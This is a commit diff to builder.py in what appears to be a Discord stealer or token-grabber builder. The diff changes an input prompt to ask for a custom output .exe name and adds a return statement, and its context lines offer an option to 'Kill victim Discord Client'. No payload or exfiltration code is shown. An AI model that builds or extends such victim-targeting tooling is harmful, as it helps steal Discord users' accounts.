Update builder.py

This commit is contained in:
What about KSCH 2022-10-30 21:42:20 +01:00 committed by GitHub
parent 5719a1759a
commit 22e698a945
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions

View File

@ -26,7 +26,7 @@ class Builder:
str(input(f"{Fore.GREEN}[{Fore.RESET}+{Fore.GREEN}]{Fore.RESET} Press anything to exit..."))
sys.exit()
self.filename = input(f'{Fore.GREEN}[{Fore.RESET}+{Fore.GREEN}]{Fore.RESET} Enter your filename: ')
self.filename = input(f'{Fore.GREEN}[{Fore.RESET}+{Fore.GREEN}]{Fore.RESET} Enter your custom output .exe name: ')
self.killprocess = input(f'{Fore.GREEN}[{Fore.RESET}+{Fore.GREEN}]{Fore.RESET} Kill victim Discord Client? (yes/no): ')
if self.killprocess.lower() == 'y':
@ -518,6 +518,7 @@ class Builder:
os.system('pip install --upgrade -r requirements.txt')
os.system('cls')
os.system('mode con:cols=150 lines=20')
return True